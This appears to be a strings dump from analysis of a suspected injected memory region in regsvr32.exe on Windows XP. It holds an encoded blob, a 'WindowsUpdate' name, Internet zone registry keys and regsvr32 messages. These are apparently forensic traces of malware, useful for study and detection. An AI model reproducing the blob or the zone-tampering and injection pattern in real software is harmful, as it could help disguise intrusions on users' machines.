Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD1
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom 75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD1
WindowsUpdate
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
regsvr32.exe_684_rwx_01000000_00005000:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
USER32.dll
USER32.dll
ole32.dll
ole32.dll
regsvr32.pdb
regsvr32.pdb
_wcmdln
_wcmdln
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
Excessive # of DLL's on cmdline
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
REGSVR32.EXE
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration
OleUninitialize failed.["%1" is not an executable file and no registration